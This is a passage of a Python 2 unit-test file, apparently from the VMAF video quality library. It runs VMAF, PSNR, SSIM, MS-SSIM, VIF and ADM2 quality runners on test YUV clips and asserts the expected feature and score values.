with self.assertRaises(AssertionError):
VmafPhoneQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner = VmafPhoneQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_Phone_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAF_Phone_score'], 100.0, places=4)
def test_run_vmaf_runner_checkerboard(self):
print 'test on running VMAF runner on checkerboard pattern...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
dis_path2 = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_1_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':1920, 'height':1080})
asset2 = Asset(dataset="test", content_id=0, asset_id=2,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path2,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset, asset_original, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.053996580527295335, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 0.999998395234, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.00000122625, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999998263056, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0000000801, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale0_score'], 0.112931470868, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale1_score'], 0.298448603112, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale2_score'], 0.337612207676, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_vif_scale3_score'], 0.496419716304, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[2]['VMAF_feature_adm2_score'], 0.7853384465157921, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 7.985956215118768, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.142659046424384, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 35.066157497128764, places=4)
def test_run_vmaf_runner_flat(self):
print 'test on running VMAF runner on flat pattern...'
ref_path, dis_path, asset, asset_original = set_default_flat_1920_1080_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 0.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 97.427927701008869, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 97.428042675471147, places=4)
def test_run_vmaf_runner_with_rf_model(self):
print 'test on running VMAF runner with custom input model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_vmaff_rf_v2.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'],4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
def test_run_vmaf_runner_with_norm_type_none(self):
print 'test on running VMAF quality runner with custom model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store,
optional_dict={
'model_filepath':VmafConfig.model_path("nflxtrain_norm_type_none.pkl"),
},
optional_dict2=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'],0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 74.253349625150562, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 77.996338095161946, places=4)
def test_run_ensemblevmaf_runner_same_models(self):
print 'test on running EnsembleVMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = EnsembleVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_0_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_1_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_score'], 76.699271272486044, places=4)
def test_run_ensemblevmaf_runner_different_models(self):
print 'test on running EnsembleVMAF runner with different models...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = EnsembleVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': [VmafConfig.model_path("vmaf_v0.6.1.pkl"), VmafConfig.model_path("vmaf_v0.6.0.pkl")],
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_0_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_model_1_score'], 81.78388541156974, places=4)
self.assertAlmostEqual(results[0]['EnsembleVMAF_score'], 79.24157800929017, places=4)
def test_run_psnr_runner(self):
print 'test on running PSNR runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[0]['PSNR_scores'][2], 30.993823, places=4)
def test_run_vmafossexec_runner(self):
print 'test on running VMAFOSSEXEC runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'],0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'],0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'],0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'],99.946416604585025, places=4)
def test_run_vmafossexec_runner_with_thread(self):
print 'test on running VMAFOSSEXEC runner with thread...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'thread': 3}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'],99.946416604585025, places=4)
def test_run_vmafossexec_runner_with_subsample(self):
print 'test on running VMAFOSSEXEC runner with subsample...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'subsample': 5}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.954390000000018, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.742800000000003, places=4)
def test_run_vmafossexec_runner_with_phone_score(self):
print 'test on running VMAFOSSEXEC runner with phone score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'enable_transform_score': True,
}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 92.542390144364546, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 100.0, places=4)
def test_run_vmafossexec_runner_norm_type_none(self):
print 'test on running VMAFOSSEXEC runner with norm type none...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflxtrain_norm_type_none.pkl"),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'],0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'],0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'],0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 74.253349625150562, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 77.996338095161946, places=4)
def test_run_vmafossexec_runner_yuv422p10le(self):
print 'test on running VMAFOSSEXEC runner on 10 bit le...'
ref_path = VmafConfig.test_resource_path("yuv", "src01_hrc00_576x324.yuv422p10le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "src01_hrc01_576x324.yuv422p10le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'],0.363420458333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.780577083333331, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.999999958333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.999999416667, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 72.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699271272486044, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416604585025, places=4)
def test_run_ssim_runner(self):
print 'test on running SSIM runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = SsimQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_l_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_c_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_s_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[1]['SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_l_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_c_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_s_score'], 1.0, places=4)
def test_run_ms_ssim_runner(self):
print 'test on running MS-SSIM runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 0.99899612500000001, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 0.9857694375, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 0.941185875, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 0.99923564583333324, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 0.997034020833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 0.977992145833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 0.99929210416666658, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 0.999588104167, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 0.99387125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 0.99940356249999995, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 0.999907625, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 0.998222583333, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 1., places=4)
def test_run_vmaf_runner_pool_harmonic_mean(self):
print 'test on running VMAF runner (pool harmonic mean)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
for result in results:
result.set_score_aggregate_method(ListStats.harmonic_mean)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.36259426848527943, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.76614783252704499, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.86261788202730005, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.91587319935214206, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.5480006115798028, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93454458698888132, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.5480006115798028, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.541148067714843, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.94504634354891, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
def test_run_vmaf_runner_pool_perc10(self):
print 'test on running VMAF runner (pool 10-perctile)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
for result in results:
result.set_score_aggregate_method(ListStats.perc10)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.3324451679468679, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.73826183605283979, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.84227039935569437, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.9023292478206113, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.3064741, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.92385012173707182, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.3064741, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 72.753572476835515, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
def test_run_adm2_runner(self):
print 'test on running ADM2 runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = Adm2QualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['ADM2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['ADM2_score'], 1.0, places=4)
def test_run_vif_runner(self):
print 'test on running VIF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VifQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VIF_score'], 0.44609339583333335, places=4)
self.assertAlmostEqual(results[1]['VIF_score'], 1.0, places=4)
def test_run_vif2_runner(self):
print 'test on running VIF2 runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = Vif2QualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VIF2_score'], 0.7272233644583975, places=4)
self.assertAlmostEqual(results[1]['VIF2_score'], 1.0, places=4)
def test_run_vmaf_runner_with_transform_score(self):
print 'test on running VMAF runner with score transforming...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
